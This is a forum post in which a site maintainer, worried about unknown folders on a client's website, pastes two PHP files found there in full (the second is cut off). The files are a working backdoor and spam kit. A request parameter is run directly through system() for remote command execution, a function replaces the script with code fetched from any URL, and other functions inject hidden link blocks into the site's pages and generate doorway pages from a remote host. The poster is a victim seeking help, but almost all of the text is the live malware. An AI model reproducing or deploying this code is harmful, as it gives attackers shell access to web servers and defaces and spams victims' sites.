Jump to content
Stef's Coding Community
Sign in to follow this  
Andrea

What is this strange file????

Recommended Posts

I was just looking at a client's site and noticed two very strange folders that I have nothing to do with. One is called bpbhl and contains only one file - qxn.php which has this in it:

 

Sorry this is so long, but since I have no clue what might be essential and what not, I figure I better post everything. Can anyone tell what this might be about? I'm concerned.

 

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

	if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

	if (isset($_GET["md"]))
	$md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$i_dor = trim($fconf[0]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
	for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}

	fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen(".htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 

	$f1t = fopen("1g", "w+");
	$f1tname = $sg."1g.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$a1g = file("1g");
$ar1 = array("<li>","<p>","<br>");
$ar2 = array("</li>","</p>","<br>");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$rndo = mt_rand(0,count($ar1)-1);
	$ob1 = $ar1[$rndo];		
	$ob2 = $ar2[$rndo];	
	$cth = trim($a1t[$i_dor]);
	$tmp1 = explode("||", $cth);
	$cth = $tmp1[1];
	$curname = $tmp1[0];
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);


preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle );
$mtitle = trim($mtitle[0][0]);
$mtitle = strip_tags($mtitle);
$keyr1 = ereg_replace(" ", "+", $mtitle);	
$keyr1 = ereg_replace("\n","", $keyr1);
//echo "keyr=$keyr1";
$fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r");
	$yahp = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $yahp .= $fc;
	}
fclose($fp);



preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles );

$titles = $titles[0];
for ($i=0; $i<count($titles); $i++)
{
	$titles[$i] = strip_tags($titles[$i]);
}



preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs );


$decs = $decs[1];
for ($i=0; $i<count($decs); $i++)
{
	$decs[$i] = strip_tags($decs[$i]);
}


for ($i=3; $i<count($titles); $i++)
{
	$fin = ereg_replace("<KEYT$i>", $titles[$i], $fin);
}


for ($i=0; $i<count($decs); $i++)
{
	$fin = ereg_replace("<KEYD$i>", $decs[$i], $fin);
}

for ($i=0; $i<100; $i++)
{
	$fin = ereg_replace("<KEYD$i>", "", $fin);
	$fin = ereg_replace("<KEYT$i>", "", $fin);
}


		$links ="";

	if (($i_dor<192) || ($i_dor>199))
	{
		$rlink1 = mt_rand(1,4);

		while (true) {
			$rlink2 = mt_rand(1,4);
			if ($rlink2!=$rlink1) {
				break;
			}
		}


		$srnd = mt_rand(3,8);
		$links1 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin);

		$srnd = mt_rand(3,8);
		$links2 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,7);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin);

	}


	if ($i_dor==192)
	{
		$links1 = "";
		$links2 = "";
		$links3 = "";
		$links4 = "";

		for ($y=0; $y<80; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}

		$fin = ereg_replace("<LINKSM1>", $links1, $fin);
		for ($y=80; $y<160; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM2>", $links2, $fin);
		for ($y=160; $y<240; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n";
		}
		$fin = ereg_replace("<LINKSM3>", $links3, $fin);
		for ($y=240; $y<320; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM4>", $links4, $fin);

	}


			$fin = ereg_replace("<LINKSD1>", "", $fin);
		$fin = ereg_replace("<LINKSD2>", "", $fin);
		$fin = ereg_replace("<LINKSD3>", "", $fin);
		$fin = ereg_replace("<LINKSD4>", "", $fin);

 $fin = ereg_replace("<LINKSM1>", "", $fin);
		$fin = ereg_replace("<LINKSM2>", "", $fin);
		$fin = ereg_replace("<LINKSM3>", "", $fin);
		$fin = ereg_replace("<LINKSM4>", "", $fin);

$curs = $cth;

$fnd = fopen("$curname".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==192 ))
{
	fwrite($fr, "$curname".".php||$curs\n");
}
if (($md) && ($i_dor!=192 ) )
{
	fwrite($f2r, "$curname".".php||$curs\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
	for ($i=0; $i<3; $i++)
	{
 	$ran = mt_rand(0,26);
 	$sym = $alp[$ran];
 	$nm = $nm.$sym;
 }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<3; $i++)
	{
	$ran = mt_rand(0,26);
	$sym = $alp[$ran];
	$nm = $nm.$sym;
}
	$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
$endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// ??????? ??????????? ???? ????
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
 $fc = fgets($fp, 1024);
 if (!$fc) 
 { 
	exit();
 }
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag; 
$fin = $fin.$drs;
$fin = $fin.$endtag; 
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>

The other folder is called euhdy and contains error_log, tur.php, and w.txt (is empty). tur.php contains

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

	if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

	if (isset($_GET["md"]))
	$md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$i_dor = trim($fconf[0]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
	for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}

	fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen(".htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 

	$f1t = fopen("1g", "w+");
	$f1tname = $sg."1g.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$a1g = file("1g");
$ar1 = array("<li>","<p>","<br>");
$ar2 = array("</li>","</p>","<br>");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$rndo = mt_rand(0,count($ar1)-1);
	$ob1 = $ar1[$rndo];		
	$ob2 = $ar2[$rndo];	
	$cth = trim($a1t[$i_dor]);
	$tmp1 = explode("||", $cth);
	$cth = $tmp1[1];
	$curname = $tmp1[0];
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);


preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle );
$mtitle = trim($mtitle[0][0]);
$mtitle = strip_tags($mtitle);
$keyr1 = ereg_replace(" ", "+", $mtitle);	
$keyr1 = ereg_replace("\n","", $keyr1);
//echo "keyr=$keyr1";
$fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r");
	$yahp = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $yahp .= $fc;
	}
fclose($fp);



preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles );

$titles = $titles[0];
for ($i=0; $i<count($titles); $i++)
{
	$titles[$i] = strip_tags($titles[$i]);
}



preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs );


$decs = $decs[1];
for ($i=0; $i<count($decs); $i++)
{
	$decs[$i] = strip_tags($decs[$i]);
}


for ($i=3; $i<count($titles); $i++)
{
	$fin = ereg_replace("<KEYT$i>", $titles[$i], $fin);
}


for ($i=0; $i<count($decs); $i++)
{
	$fin = ereg_replace("<KEYD$i>", $decs[$i], $fin);
}

for ($i=0; $i<100; $i++)
{
	$fin = ereg_replace("<KEYD$i>", "", $fin);
	$fin = ereg_replace("<KEYT$i>", "", $fin);
}


		$links ="";

	if (($i_dor<192) || ($i_dor>199))
	{
		$rlink1 = mt_rand(1,4);

		while (true) {
			$rlink2 = mt_rand(1,4);
			if ($rlink2!=$rlink1) {
				break;
			}
		}


		$srnd = mt_rand(3,8);
		$links1 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin);

		$srnd = mt_rand(3,8);
		$links2 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,7);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin);

	}


	if ($i_dor==192)
	{
		$links1 = "";
		$links2 = "";
		$links3 = "";
		$links4 = "";

		for ($y=0; $y<80; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}

		$fin = ereg_replace("<LINKSM1>", $links1, $fin);
		for ($y=80; $y<160; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM2>", $links2, $fin);
		for ($y=160; $y<240; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n";
		}
		$fin = ereg_replace("<LINKSM3>", $links3, $fin);
		for ($y=240; $y<320; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM4>", $links4, $fin);

	}


			$fin = ereg_replace("<LINKSD1>", "", $fin);
		$fin = ereg_replace("<LINKSD2>", "", $fin);
		$fin = ereg_replace("<LINKSD3>", "", $fin);
		$fin = ereg_replace("<LINKSD4>", "", $fin);

 $fin = ereg_replace("<LINKSM1>", "", $fin);
		$fin = ereg_replace("<LINKSM2>", "", $fin);
		$fin = ereg_replace("<LINKSM3>", "", $fin);
		$fin = ereg_replace("<LINKSM4>", "", $fin);

$curs = $cth;

$fnd = fopen("$curname".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==192 ))
{
	fwrite($fr, "$curname".".php||$curs\n");
}
if (($md) && ($i_dor!=192 ) )
{
	fwrite($f2r, "$curname".".php||$curs\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
	for ($i=0; $i<3; $i++)
	{
 	$ran = mt_rand(0,26);
 	$sym = $alp[$ran];
 	$nm = $nm.$sym;
 }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<3; $i++)
	{
	$ran = mt_rand(0,26);
	$sym = $alp[$ran];
	$nm = $nm.$sym;
}
	$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
